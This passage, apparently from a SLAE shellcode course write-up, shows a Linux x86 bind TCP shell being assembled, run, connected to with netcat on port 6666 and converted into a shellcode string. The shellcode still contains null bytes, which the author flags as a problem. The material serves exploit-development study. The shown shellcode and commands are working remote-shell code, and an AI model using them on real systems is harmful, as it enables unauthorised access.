Let’s try compile and run the file. For compilation I’ve been using modified scripts from the SLAE course, to ease to many compilation tasks when adjusting the code.
The used scripts are available from my Github page.
Compile ASM
Compiling the .asm file produces the expected .o object file and the linked ELF binary itself. No errors being shown, so compilation was successful.
$ ../compile_asm.sh bind_tcp_initial
[+] Assembling with Nasm ...
[+] Linking ...
[+] Done!$ ls -ltr
-rw-rw-r-- 1 vbox vbox 4418 Nov 26 07:47 bind_tcp_initial.asm
-rw-rw-r-- 1 vbox vbox 592 Nov 26 07:47 bind_tcp_initial.o
-rwxrwxr-x 1 vbox vbox 673 Nov 26 07:47 bind_tcp_initialRunning the ASM binary
When running the just compiled binary, it runs as it should.
$ ./bind_tcp_initial &
[1] 2488
$ ps ax | grep 2488
2488 pts/0 S 0:00 ./bind_tcp_initial
$ nc localhost 6666
id
uid=1000(vbox) gid=1000(vbox) groups=1000(vbox),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),107(lpadmin),124(sambashare)
uname -a
Linux study-slae 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/LinuxConverting to shellcode for C compilation
Next step is to attempt to convert the binary file to shellcode for C compilation. This way we can run the shellcode in a C file for later debugging purposes.
$ ../convert_bin_sc.sh bind_tcp_initial
"\xb8\x66\x00\x00\x00\xbb\x01\x00\x00\x00\x6a\x00\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc2\x6a\x00\x66\x68\x1a\x0a\x66\x6a\x02\x89\xe1\xb8\x66\x00\x00\x00\xbb\x02\x00\x00\x00\x6a\x10\x51\x52\x89\xe1\xcd\x80\xb8\x66\x00\x00\x00\xbb\x04\x00\x00\x00\x6a\x00\x52\x89\xe1\xcd\x80\xb8\x66\x00\x00\x00\xbb\x05\x00\x00\x00\x6a\x00\x6a\x00\x52\x89\xe1\xcd\x80\x89\xc2\xb8\x3f\x00\x00\x00\x89\xd3\xb9\x00\x00\x00\x00\xcd\x80\xb8\x3f\x00\x00\x00\x89\xd3\xb9\x01\x00\x00\x00\xcd\x80\xb8\x3f\x00\x00\x00\x89\xd3\xb9\x02\x00\x00\x00\xcd\x80\xb8\x0b\x00\x00\x00\x6a\x00\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb9\x00\x00\x00\x00\xba\x00\x00\x00\x00\xcd\x80"What draws out attention? Null-bytes! Due to null bytes terminating a string, the shellcode will be cut off execution prematurely.